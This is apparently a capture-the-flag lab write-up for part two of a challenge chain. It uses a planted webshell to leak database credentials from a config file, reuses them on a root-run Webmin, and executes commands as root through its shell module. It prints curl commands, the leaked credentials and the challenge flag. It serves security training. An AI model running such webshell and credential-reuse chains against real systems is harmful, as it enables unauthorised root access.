Chain of Attacks - II
192.168.1.21OWASPKL{xxx}1. Challenge Overview
Continue from the Part I www-data webshell. Escalate to root and read /root/proof.txt:
Use the webshell to find local services and leak DB credentials from db.config.
Reuse those credentials on Webmin (9090), which runs as root.
Run a command as root in the Webmin shell module.
2. Initial Reconnaissance
2.1 Enumerate from the Part I webshell
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=id'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=ss%20-tln'1uid=33(www-data) gid=33(www-data) groups=33(www-data)2LISTEN 0 ... 127.0.0.1:33063LISTEN 0 ... 0.0.0.0:9090 # Webmin / MiniServ3. Analysis / Forensics Path
3.1 Locate and read db.config
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=find%20/var/www/html%20-name%20db.config'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=cat%20/var/www/html/ritecms/db.config'1[database]2host = localhost3name = chaindb4username = aimantino5password = 4iman_4dmin@20246port = 3306The DB user aimantino:4iman_4dmin@2024 is the only reusable credential on the box — the pivot target is the root-run Webmin on 9090.
4. Exploitation / Recovery
4.1 Log into Webmin with the leaked creds
1curl -k -s -c /tmp/wm.cookie https://192.168.1.21:9090/ > /dev/null2curl -k -s -i -b /tmp/wm.cookie -c /tmp/wm.cookie \3 -d 'page=%2F&user=aimantino&pass=4iman_4dmin%402024' \4 -X POST https://192.168.1.21:9090/session_login.cgi1HTTP/1.0 302 Moved Temporarily2Set-Cookie: sid=...; path=/; secure; httpOnly; SameSite=Lax3Location: https://192.168.1.21:9090/4.2 Run a root command in the Webmin Shell module
/shell/index.cgi expects multipart/form-data, so use -F. Webmin runs as root, so the command output is root-owned. List /root, hunt the flag pattern, then read it.
1curl -k -s -b /tmp/wm.cookie \2 -H 'Referer: https://192.168.1.21:9090/shell/' \3 -X POST 'https://192.168.1.21:9090/shell/index.cgi' \4 -F 'cmd=id; ls -la /root; grep -Rns "OWASPKL{" /root 2>/dev/null; cat /root/proof.txt' \5 -F 'pwd=/root' -F 'history='1uid=0(root) gid=0(root) groups=0(root)2drwx------ 1 root root 4096 ... .3-rw-r--r-- 1 root root 42 May 25 21:17 proof.txt4/root/proof.txt:1:OWASPKL{68e8511198425c0cbbb3f0d182314afd}5OWASPKL{68e8511198425c0cbbb3f0d182314afd}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): Webmin login returned 302 for aimantino, the Command Shell module loaded (Command Shell - Webmin 2.641 on chain); ls -la /root + grep "OWASPKL{" located /root/proof.txt (root-owned, 42 bytes) holding the flag above.
>
5. Flag
6. Summary of Approach & Key Takeaways
Reused the Part I www-data webshell.
Found 127.0.0.1:3306 and root-run Webmin on 0.0.0.0:9090.
Leaked aimantino:4iman_4dmin@2024 from db.config.
Reused those creds on Webmin (login 302).
Executed cat /root/proof.txt as root via the Webmin shell module.
Plaintext creds in app config files are a direct privilege-escalation vector when reused on a root service.
Webmin's shell module = instant root RCE once authenticated.